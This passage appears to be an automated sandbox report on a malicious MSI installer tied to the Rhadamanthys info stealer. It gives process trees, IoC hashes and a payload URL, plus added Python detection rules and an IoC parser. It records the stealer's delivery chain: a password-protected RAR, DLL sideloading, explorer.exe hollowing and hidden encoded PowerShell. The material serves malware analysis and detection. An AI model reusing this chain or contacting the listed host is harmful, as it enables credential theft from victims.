Analysis
-
max time kernel: 90s
max time network: 149s
platform: windows11-21h2_x64
resource: win11-20240611-en
resource tags: arch:x64, arch:x86, image:win11-20240611-en, locale:en-us, os:windows11-21h2-x64, system
submitted: 24-06-2024 14:13
Static task: static1
Behavioral task behavioral1: sample x64__installer___x32__.zip, resource win11-20240508-en
Behavioral task behavioral2: sample __x64___setup___x32__.zip, resource win11-20240611-en
Behavioral task behavioral3: sample setup.msi, resource win11-20240611-en
Behavioral task behavioral4: sample password.jpg, resource win11-20240611-en
General
-
Target: setup.msi
Size: 25.2MB
MD5: be2a13cfa57db16d3f654c5e444c360b
SHA1: 7f45d2a4debbbca678cc5c300c59af01ca197bca
SHA256: b086cb6063a6fe194342b3dbe7639aebab02513305c95a914d052e87b54e0523
SHA512: 978f4fb1e9df0785bbcd2734d4a7b32d3acab4a215075f0860ccc879bf65714e2c6eabba41ee7c38c0394a9a08b60757544034b21c336c2a3f233a411744953e
SSDEEP: 786432:++aMGdE4CF4EgcHxa3pS58g0nfZ3AOnr:++aMGrCKEg+xwS5MGOr
Malware Config
Extracted: https://gotry-gotry.com/2306s1.bs64
Signatures
-
Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
explorer.exe (PID 4704) created a process under a different parent: target process sihost.exe (PID 3008). In the process tree below, openwith.exe is the only process listed beneath sihost.exe.
Blocklisted process makes network request 4 IoCs
Processes:
flows 3, 4 and 5: MsiExec.exe (PID 3028, the -Embedding custom-action host); flow 31: powershell.exe (PID 2300)
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Runs PowerShell with its display window hidden (the powershell -windowstyle hidden -e line in the process tree).
-
Enumerates connected drives 3 TTPs 46 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
File opened (read-only) by msiexec.exe, 46 entries across the two msiexec.exe processes; each of the 23 letters below appears twice: \??\A: \??\B: \??\E: \??\G: \??\H: \??\I: \??\J: \??\K: \??\L: \??\M: \??\N: \??\O: \??\P: \??\Q: \??\R: \??\S: \??\T: \??\U: \??\V: \??\W: \??\X: \??\Y: \??\Z:
Both processes are Windows Installer itself, which opens every volume while calculating disk cost, so this signature fires for most MSI installs and is not specific to the payload.
Suspicious use of SetThreadContext 1 IoCs
Processes:
steamerrorreporter64.exe (PID 5056) set thread context of explorer.exe (PID 4704). Together with the 32-bit explorer.exe child it starts and the three WerFault crashes of PID 4704, this is the injection step into explorer.exe.
Drops file in Windows directory 20 IoCs
Processes:
All by msiexec.exe:
File opened for modification C:\Windows\Installer\MSI770C.tmp
File created C:\Windows\SystemTemp\~DF04549351EC469D31.TMP
File created C:\Windows\Installer\e576f92.msi
File opened for modification C:\Windows\Installer\MSI709E.tmp
File opened for modification C:\Windows\Installer\MSI76FB.tmp
File created C:\Windows\Installer\inprogressinstallinfo.ipi
File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log
File opened for modification C:\Windows\Installer\MSI716C.tmp
File created C:\Windows\Installer\SourceHash{CFA551BC-936D-4E76-9637-B181E28B5AC5}
File opened for modification C:\Windows\Installer\MSI8797.tmp
File created C:\Windows\Installer\e576f96.msi
File created C:\Windows\SystemTemp\~DF8C903233F94E7837.TMP
File opened for modification C:\Windows\Installer\e576f92.msi
File opened for modification C:\Windows\Installer\MSI6FE0.tmp
File opened for modification C:\Windows\Installer\MSI70DE.tmp
File opened for modification C:\Windows\Installer\
File created C:\Windows\SystemTemp\~DFBEFE6FCD43B74712.TMP
File created C:\Windows\SystemTemp\~DFD4075232ECE440DB.TMP
File opened for modification C:\Windows\Installer\MSI705E.tmp
File opened for modification C:\Windows\Installer\MSI70AF.tmp
The SourceHash{...} file name carries the package's ProductCode, {CFA551BC-936D-4E76-9637-B181E28B5AC5}, which can be used to find the same install registered on other hosts.
Executes dropped EXE 2 IoCs
Processes:
UnRAR.exe (PID 2220); steamerrorreporter64.exe (PID 5056)
Loads dropped DLL 10 IoCs
Processes:
MsiExec.exe (PID 3028): 8 entries; steamerrorreporter64.exe (PID 5056): 2 entries. The two DLLs dropped beside steamerrorreporter64.exe (tier0_s64.dll and vstdlib_s64.dll, listed under Downloads) are its sideload candidates.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Installer Packages 1 TTPs 1 IoCs
-
Program crash 3 IoCs
Processes:
WerFault.exe PIDs 4880, 1232 and 3328, each for target process explorer.exe (PID 4704)
Checks processor information in registry 2 TTPs 10 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
All ten reads are by firefox.exe, which runs as a separate top-level process outside the sample's tree; none is by a process in the sample's chain.
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 (2)
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString (2)
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier (2)
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz (2)
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature (1)
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision (1)
Modifies registry class 1 IoCs
Processes:
Key created \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000_Classes\Local Settings by firefox.exe
Suspicious behavior: EnumeratesProcesses 12 IoCs
Processes:
msiexec.exe (PID 3420): 2 entries; powershell.exe (PID 2300): 4 entries; explorer.exe (PID 4704): 2 entries; openwith.exe (PID 1404): 4 entries
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
msiexec.exe (PID 2884), 31 entries: SeShutdownPrivilege, SeIncreaseQuotaPrivilege, SeCreateTokenPrivilege, SeAssignPrimaryTokenPrivilege, SeLockMemoryPrivilege, SeIncreaseQuotaPrivilege, SeMachineAccountPrivilege, SeTcbPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeSystemEnvironmentPrivilege, SeChangeNotifyPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeSyncAgentPrivilege, SeEnableDelegationPrivilege, SeManageVolumePrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
msiexec.exe (PID 3420), 31 entries: SeSecurityPrivilege once, then SeRestorePrivilege and SeTakeOwnershipPrivilege alternately (15 each)
firefox.exe (PID 8), 2 entries: SeDebugPrivilege
The msiexec.exe entries are the Windows Installer client and service enabling their usual privilege set; any MSI install produces them.
Suspicious use of FindShellTrayWindow 6 IoCs
Processes:
msiexec.exe (PID 2884): 2 entries; firefox.exe (PID 8): 4 entries
Suspicious use of SendNotifyMessage 3 IoCs
Processes:
firefox.exe (PID 8): 3 entries
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
firefox.exe (PID 8); MiniSearchHost.exe (PID 3572)
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
msiexec.exe (PID 3420) wrote to memory of MsiExec.exe (PID 3028): 3 entries
firefox.exe (PID 4680) wrote to memory of firefox.exe (PID 8): 11 entries
firefox.exe (PID 8) wrote to memory of firefox.exe (PID 1816): 43 entries
firefox.exe (PID 8) wrote to memory of firefox.exe (PID 1500): 7 entries
The firefox.exe entries are the browser launching its own -contentproc children (see the process tree) and are unrelated to the sample; the msiexec.exe entries are the installer service starting its custom-action host.
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
Each entry gives the tree depth in brackets, the image path, and then the command line; the signatures that process triggered follow it. Depth 1 is a top-level process; a depth n+1 entry is a child of the nearest preceding depth n entry.
-
[1] C:\Windows\system32\sihost.exe
    sihost.exe
-
[2] C:\Windows\SysWOW64\openwith.exe
    "C:\Windows\system32\openwith.exe"
- Suspicious behavior: EnumeratesProcesses
-
[1] C:\Windows\system32\msiexec.exe
    msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\setup.msi
- Enumerates connected drives
- Event Triggered Execution: Installer Packages
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
-
[1] C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
[2] C:\Windows\syswow64\MsiExec.exe
    C:\Windows\syswow64\MsiExec.exe -Embedding 355252D9F557FDD8C39760E58BEA8BF7
- Blocklisted process makes network request
- Loads dropped DLL
-
[2] C:\Users\Admin\AppData\Roaming\Yinanob Coop Aq\PubSurf\UnRAR.exe
    "C:\Users\Admin\AppData\Roaming\Yinanob Coop Aq\PubSurf\UnRAR.exe" x -p2664926658a "C:\Users\Admin\AppData\Roaming\Yinanob Coop Aq\PubSurf\ruw9eigh.rar" "C:\Users\Admin\AppData\Roaming\Yinanob Coop Aq\PubSurf\"
- Executes dropped EXE
-
[2] C:\Users\Admin\AppData\Roaming\Yinanob Coop Aq\PubSurf\steamerrorreporter64.exe
    "C:\Users\Admin\AppData\Roaming\Yinanob Coop Aq\PubSurf\steamerrorreporter64.exe"
- Suspicious use of SetThreadContext
- Executes dropped EXE
- Loads dropped DLL
-
[3] C:\Windows\SysWOW64\explorer.exe
    C:\Windows\SysWOW64\explorer.exe explorer.exe
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious behavior: EnumeratesProcesses
-
[4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -windowstyle hidden -e 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
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
[4] C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4704 -s 1840
- Program crash
-
[4] C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4704 -s 2004
- Program crash
-
[4] C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4704 -s 1836
- Program crash
-
[1] C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe"
- Suspicious use of WriteProcessMemory
-
[2] C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe"
- Checks processor information in registry
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
[3] C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="8.0.1499450250\1119165367" -parentBuildID 20230214051806 -prefsHandle 1712 -prefMapHandle 1724 -prefsLen 21996 -prefMapSize 235091 -appDir "C:\Program Files\Mozilla Firefox\browser" - {7d046ce0-8940-434e-8458-395dd99b7566} 8 "\\.\pipe\gecko-crash-server-pipe.8" 1816 1f598d2cb58 gpu
-
[3] C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="8.1.625758782\1037683223" -parentBuildID 20230214051806 -prefsHandle 2328 -prefMapHandle 2324 -prefsLen 22032 -prefMapSize 235091 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {94e73726-ee68-4878-93fe-0ed0a07ede81} 8 "\\.\pipe\gecko-crash-server-pipe.8" 2340 1f584988458 socket
- Checks processor information in registry
-
[3] C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="8.2.1574037111\647923608" -childID 1 -isForBrowser -prefsHandle 2800 -prefMapHandle 2856 -prefsLen 22070 -prefMapSize 235091 -jsInitHandle 1296 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {270e61cf-d902-4119-a4bb-8f5e335d5abc} 8 "\\.\pipe\gecko-crash-server-pipe.8" 2804 1f59ba0a858 tab
-
[3] C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="8.3.2128743508\1273882628" -childID 2 -isForBrowser -prefsHandle 3476 -prefMapHandle 3460 -prefsLen 27536 -prefMapSize 235091 -jsInitHandle 1296 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e51bb7f5-be33-449b-8968-b3c6c8cd7733} 8 "\\.\pipe\gecko-crash-server-pipe.8" 3580 1f59e603b58 tab
-
[3] C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="8.4.1160966184\1555315527" -childID 3 -isForBrowser -prefsHandle 5068 -prefMapHandle 5064 -prefsLen 27536 -prefMapSize 235091 -jsInitHandle 1296 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d1c31171-c228-4ca5-bb1a-69f9363a9276} 8 "\\.\pipe\gecko-crash-server-pipe.8" 4172 1f5a06c7a58 tab
-
[3] C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="8.5.204844938\1311730442" -childID 4 -isForBrowser -prefsHandle 5212 -prefMapHandle 5216 -prefsLen 27536 -prefMapSize 235091 -jsInitHandle 1296 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e512fe5d-dfa9-4969-b73f-c9a14f93d82f} 8 "\\.\pipe\gecko-crash-server-pipe.8" 5200 1f5a06c7d58 tab
-
[3] C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="8.6.46477761\13589618" -childID 5 -isForBrowser -prefsHandle 5404 -prefMapHandle 5412 -prefsLen 27536 -prefMapSize 235091 -jsInitHandle 1296 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0a028ead-24d5-4812-8fd7-28a9a9d30575} 8 "\\.\pipe\gecko-crash-server-pipe.8" 5396 1f5a06c9558 tab
-
[1] C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 4704 -ip 4704
-
[1] C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 4704 -ip 4704
-
[1] C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 4704 -ip 4704
-
[1] C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe
    "C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe" -ServerName:MiniSearchUI.AppXj3y73at8fy1htwztzxs68sxx1v7cksp7.mca
- Suspicious use of SetWindowsHookEx
-
[1] C:\Windows\System32\rundll32.exe
    C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
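The following is an added example, not part of the sandbox report or of any tool it names: four detection rules for the chain above (the installer running a dropped EXE, UnRAR called with an inline password, a dropped EXE starting the 32-bit explorer.exe that is then hollowed, and explorer.exe starting hidden, encoded PowerShell), evaluated over constructed Sysmon Event ID 1 style records. PIDs, image paths and command lines are taken from the report; the parent of the msiexec.exe service process, the placeholder standing in for the removed encoded command, and the benign control event are assumptions.

```python
"""Added example (not part of the sandbox report): detection rules for the
execution chain in the process tree, evaluated over constructed Sysmon
Event ID 1 style records. PIDs, image paths and command lines are copied
from the report; anything marked ASSUMED is this example's own."""
from dataclasses import dataclass
import re


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str         # Sysmon "Image": full path of the created process
    cmdline: str       # Sysmon "CommandLine"
    parent_image: str  # Sysmon "ParentImage"


# Paths under a user's AppData tree, where the installer dropped its payload.
USER_WRITABLE = re.compile(r"^[a-z]:\\users\\[^\\]+\\appdata\\", re.I)

PUBSURF = r"C:\Users\Admin\AppData\Roaming\Yinanob Coop Aq\PubSurf"

# Constructed events modelled on the report's tree. The installer service's
# parent, the "-e" placeholder and the final control event are ASSUMED.
SAMPLE_EVENTS = [
    ProcEvent(3420, 700, r"C:\Windows\system32\msiexec.exe",
              r"C:\Windows\system32\msiexec.exe /V",
              r"C:\Windows\system32\services.exe"),             # parent ASSUMED
    ProcEvent(2220, 3420, PUBSURF + r"\UnRAR.exe",
              '"' + PUBSURF + r'\UnRAR.exe" x -p2664926658a "' + PUBSURF
              + r'\ruw9eigh.rar" "' + PUBSURF + '\\"',
              r"C:\Windows\system32\msiexec.exe"),
    ProcEvent(5056, 3420, PUBSURF + r"\steamerrorreporter64.exe",
              '"' + PUBSURF + r'\steamerrorreporter64.exe"',
              r"C:\Windows\system32\msiexec.exe"),
    ProcEvent(4704, 5056, r"C:\Windows\SysWOW64\explorer.exe",
              r"C:\Windows\SysWOW64\explorer.exe explorer.exe",
              PUBSURF + r"\steamerrorreporter64.exe"),
    ProcEvent(2300, 4704, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell -windowstyle hidden -e REDACTED",   # blob not in report; ASSUMED
              r"C:\Windows\SysWOW64\explorer.exe"),
    # ASSUMED benign control: the real shell starting an interactive PowerShell.
    ProcEvent(9001, 9000, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -NoProfile", r"C:\Windows\explorer.exe"),
]


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def rule_installer_runs_dropped_exe(ev: ProcEvent) -> bool:
    """msiexec.exe starting an executable from the user's AppData tree:
    the installer's payload rather than a Windows component."""
    return basename(ev.parent_image) == "msiexec.exe" and bool(USER_WRITABLE.match(ev.image))


def rule_unrar_with_inline_password(ev: ProcEvent) -> bool:
    """UnRAR extracting with an inline -p<password>: the payload archive was
    password-protected so it could not be unpacked or scanned at rest."""
    return (basename(ev.image) == "unrar.exe"
            and bool(USER_WRITABLE.match(ev.image))
            and re.search(r"\s-p\S+", ev.cmdline) is not None)


def rule_appdata_binary_spawns_wow64_explorer(ev: ProcEvent) -> bool:
    """A binary in AppData starting the 32-bit explorer.exe under SysWOW64.
    The shell is the 64-bit explorer.exe started at logon, so a 32-bit copy
    created by a dropped EXE is a hollowing target (the SetThreadContext
    signature: PID 5056 set the thread context of PID 4704)."""
    return (USER_WRITABLE.match(ev.parent_image) is not None
            and ev.image.lower() == r"c:\windows\syswow64\explorer.exe")


def rule_explorer_spawns_hidden_encoded_powershell(ev: ProcEvent) -> bool:
    """explorer.exe starting powershell.exe with a hidden window and an
    encoded command, as in the tree."""
    cl = ev.cmdline.lower()
    return (basename(ev.parent_image) == "explorer.exe"
            and basename(ev.image) == "powershell.exe"
            and "-windowstyle hidden" in cl
            and re.search(r"\s-e(nc(odedcommand)?)?\s", cl) is not None)


RULES = (rule_installer_runs_dropped_exe, rule_unrar_with_inline_password,
         rule_appdata_binary_spawns_wow64_explorer,
         rule_explorer_spawns_hidden_encoded_powershell)


def evaluate(events):
    """Return (rule name, pid) for every event matching a rule, in event
    order, so each hit maps back to one line of the process tree."""
    return [(rule.__name__, ev.pid) for ev in events for rule in RULES if rule(ev)]


if __name__ == "__main__":
    for name, pid in evaluate(SAMPLE_EVENTS):
        print(f"{name}: pid {pid}")
```

The rules key on parent/child relationships, paths and switches rather than on file hashes, so they still fire when the dropped binaries are rebuilt; run evaluate() over real Sysmon exports and review each hit against the matching line of the process tree.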
Network
MITRE ATT&CK Matrix ATT&CK v13
Downloads
-
C:\Config.Msi\e576f95.rbs
Filesize: 22KB
MD5: fb99f8a0435d05143a29817ab7ae69af
SHA1: 0a601b995ae2b28a55164cedea392c9140c19fe7
SHA256: af2e2c5d5cc915ea13633478b391759cbdef6a3b769531e9d5afb596c7a7b064
SHA512: 05db6ba85f3ee7b28e3b3dacc240f6af3a8b7cd7f601f15f251f1ddb7a6cc92d2ec0470ceca28fbb0dcb727c4a785b6b26edf480654ad5f691c4a6af7b3071a5
-
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\bov3gdb6.default-release\activity-stream.discovery_stream.json.tmp
Filesize: 30KB
MD5: e9e5e3e2181273ad3736a31eaa02353a
SHA1: 0830225a270f42d024a460db19807c0236a82498
SHA256: 6473024ceb0fa47a25c0c1b97cb3a6f9efa8fc1d859f73d506d71ecdf52e4e5e
SHA512: 2541a511b56358d3dcb9833c6e6db74fbaf3514898d66d851f9876754aed4804766b6b05738293747c9f6bd9542e55321974eef76663047c667efe81be2c0734
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jacuxifo.mvt.ps1
Filesize: 60B
MD5: d17fe0a3f47be24a6453e9ef58c94641
SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bov3gdb6.default-release\prefs.js
Filesize: 6KB
MD5: a883224c555e18d2cc967e109707194a
SHA1: 40c8d528e098bfc028e8d7420117f808052cf94b
SHA256: 91f9cf7db91adbc89099b2d754ff304402a80dc8c4b083d82d72a5c60409a6c4
SHA512: c2827d81419fa97543d8cc892c9b3dbe2f11d31946f918559f8fa281039b57c0a1ffa301ee64e661c1869f7c2cf54503f7ae4656e2fe59bdf2238b67f2b34e10
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bov3gdb6.default-release\prefs.js
Filesize: 6KB
MD5: d32201032334bcd2ab23a484a31d70c0
SHA1: a7c2a5b4931af924174383e21c89b11a909f73ae
SHA256: 385e00cebe4fd40619780e50630aac4215bd2644f2fb4dc692d6b809722691ab
SHA512: cd82daae200d45ebe4fbea1799dcd0345436affb302ca1afac7196fb5cbc59424ca56b90e07198a79d3ced036564da3de9f9b3513e3a69690394e84cbc2a09c5
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bov3gdb6.default-release\sessionstore.jsonlz4
Filesize: 936B
MD5: fe40dfa8c90a0fb8ca6ae8d897fc8e7f
SHA1: 16ad6b87a782bf0bde3f17c36f113fa5b7974f98
SHA256: a499583416f5946885905112cf21b7d9bbd1b470e378fd74d36ad7d53a0e2b3c
SHA512: f8c5208073d1ebefb15b1686c800705904b7c1828806f4f0272fd070e10c02acd119f590a24354c3206bb9732def5596aabe910865398652b461650071ab426f
-
C:\Users\Admin\AppData\Roaming\Yinanob Coop Aq\PubSurf\UnRAR.exe
Filesize: 494KB
MD5: 98ccd44353f7bc5bad1bc6ba9ae0cd68
SHA1: 76a4e5bf8d298800c886d29f85ee629e7726052d
SHA256: e51021f6cb20efbd2169f2a2da10ce1abca58b4f5f30fbf4bae931e4ecaac99b
SHA512: d6e8146a1055a59cba5e2aaf47f6cb184acdbe28e42ec3daebf1961a91cec5904554d9d433ebf943dd3639c239ef11560fa49f00e1cff02e11cd8d3506c4125f
-
C:\Users\Admin\AppData\Roaming\Yinanob Coop Aq\PubSurf\ruw9eigh.rar
Filesize: 378KB
MD5: 35af121e2e55c85b99cb7daf396fb523
SHA1: f2b073afafa04d96f0bc191e280ac3b658afb404
SHA256: c64353f1e6327254ba4813d246e591f435a6f599bff9f8deb303557a73cd4257
SHA512: 24bbaa40c6c5c349dabb9c132fbf1113bc0d8116bf97229ad275d198ae05505699a9f33f9926d2147a6a036f849b928970f18aad6e8837c82f5dcc23cb28dcb0
-
C:\Users\Admin\AppData\Roaming\Yinanob Coop Aq\PubSurf\steamerrorreporter64.exe
Filesize: 639KB
MD5: fd3ce044ac234fdab3df9d7f492c470a
SHA1: a74a287d5d82a8071ab36c72b2786342d83a8ef7
SHA256: 0a0c09753b5103e86e32c2d8086dd1399f0d97a00e1525ec9c390067cdb242ba
SHA512: 86d7e805fab0e5130003facbb1525ee261440846f342f53ae64c3f8d676d1208d5fd9bd91e3222c63cc30c443348eb5ddedab14c8847dae138fba7e9be69d08d
-
C:\Users\Admin\AppData\Roaming\Yinanob Coop Aq\PubSurf\tier0_s64.dll
Filesize: 386KB
MD5: 7e60404cfb232a1d3708a9892d020e84
SHA1: 31328d887bee17641608252fb2f9cd6caf8ba522
SHA256: 5a3e15cb90baf4b3ebe0621fa6f5f37b0fe99848387d6f2fd99ae770d1e6d766
SHA512: 4d8abd59bd77bdb6e5b5e5f902d2a10fa5136437c51727783e79aed6a796f9ee1807faf14f1a72a1341b9f868f61de8c676b00a4b07a2a26cfb8a4db1b77eb3c
-
C:\Users\Admin\AppData\Roaming\Yinanob Coop Aq\PubSurf\vstdlib_s64.dll
Filesize: 1004KB
MD5: 21c2ecd34eef7e95016e43fffd704d22
SHA1: 5cc5a0305866cca388a80b9f060289c00c5ffc44
SHA256: 00fd5db000b6b591e4a843351f31216ddc120d0c417c7174d67027d65f7e9bfc
SHA512: 0738b4f562725425f1623b898ce7f744893ca979b492fc6ea4967b01f52386103a4b812a089a17b10bb06cf9da1cd38874e308013c27cd6ad484fe2f1a89b331
-
C:\Windows\Installer\MSI6FE0.tmp
Filesize: 738KB
MD5: b158d8d605571ea47a238df5ab43dfaa
SHA1: bb91ae1f2f7142b9099e3cc285f4f5b84de568e4
SHA256: ca763693cc25d316f14a9ebad80ebf00590329550c45adb7e5205486533c2504
SHA512: 56aef59c198acf2fcd0d95ea6e32ce1c706e5098a0800feff13ddb427bfb4d538de1c415a5cb5496b09a5825155e3abb1c13c8c37dc31549604bd4d63cb70591
-
C:\Windows\Installer\MSI70DE.tmp
Filesize: 1.1MB
MD5: 1a2b237796742c26b11a008d0b175e29
SHA1: cfd5affcfb3b6fd407e58dfc7187fad4f186ea18
SHA256: 81e0df47bcb2b3380fb0fb58b0d673be4ef1b0367fd2b0d80ab8ee292fc8f730
SHA512: 3135d866bf91f9e09b980dd649582072df1f53eabe4c5ac5d34fff1aeb5b6fa01d38d87fc31de19a0887a910e95309bcf0e7ae54e6e8ed2469feb64da4a4f9e5
-
C:\Windows\Installer\MSI770C.tmp
Filesize: 364KB
MD5: 54d74546c6afe67b3d118c3c477c159a
SHA1: 957f08beb7e27e657cd83d8ee50388b887935fae
SHA256: f9956417af079e428631a6c921b79716d960c3b4917c6b7d17ff3cb945f18611
SHA512: d27750b913cc2b7388e9948f42385d0b4124e48335ae7fc0bc6971f4f807dbc9af63fe88675bc440eb42b9a92551bf2d77130b1633ddda90866616b583ae924f
-
C:\Windows\Installer\e576f92.msi
Filesize: 25.2MB
MD5: be2a13cfa57db16d3f654c5e444c360b
SHA1: 7f45d2a4debbbca678cc5c300c59af01ca197bca
SHA256: b086cb6063a6fe194342b3dbe7639aebab02513305c95a914d052e87b54e0523
SHA512: 978f4fb1e9df0785bbcd2734d4a7b32d3acab4a215075f0860ccc879bf65714e2c6eabba41ee7c38c0394a9a08b60757544034b21c336c2a3f233a411744953e
Reading this list: the Firefox profile files and the __PSScriptPolicyTest_*.ps1 probe are produced by the analysis VM's browser and by PowerShell itself, not by the sample, and should not be turned into IoCs. e576f92.msi is the cached copy of the submitted package (same hashes as the target). The MSI*.tmp files under C:\Windows\Installer are the custom-action binaries msiexec extracted for the install, so they are the first artifacts to pull for static analysis, followed by the PubSurf directory contents (the password-protected ruw9eigh.rar, the UnRAR.exe used to open it, and the steamerrorreporter64.exe loader with its two companion DLLs).
-
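As an added example (not part of the report), the Downloads list can be turned into a hash blocklist and checked against endpoint telemetry. The excerpt embedded below is transcribed from the report's Downloads entries (paths and digests as listed there); the one-field-per-line layout, the filter for files the analysis VM creates on its own, and the EDR export being checked (hostname and user name) are this example's own.

```python
"""Added example (not part of the sandbox report): parse the Downloads list
into file IoCs, drop sandbox-environment noise, and check an EDR hash export
against the result. Paths and digests are transcribed from the report; the
excerpt's line layout, the noise patterns and the export are this example's
own (marked ASSUMED where they are not from the report)."""
import hashlib
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class FileIoc:
    path: str
    size: str
    md5: str
    sha1: str
    sha256: str


# Four entries transcribed from the Downloads list (constructed layout: one
# "Key: value" line per field, entries separated by a line holding only "-").
DOWNLOADS_EXCERPT = r"""C:\Users\Admin\AppData\Roaming\Yinanob Coop Aq\PubSurf\UnRAR.exe
Filesize: 494KB
MD5: 98ccd44353f7bc5bad1bc6ba9ae0cd68
SHA1: 76a4e5bf8d298800c886d29f85ee629e7726052d
SHA256: e51021f6cb20efbd2169f2a2da10ce1abca58b4f5f30fbf4bae931e4ecaac99b
-
C:\Users\Admin\AppData\Roaming\Yinanob Coop Aq\PubSurf\steamerrorreporter64.exe
Filesize: 639KB
MD5: fd3ce044ac234fdab3df9d7f492c470a
SHA1: a74a287d5d82a8071ab36c72b2786342d83a8ef7
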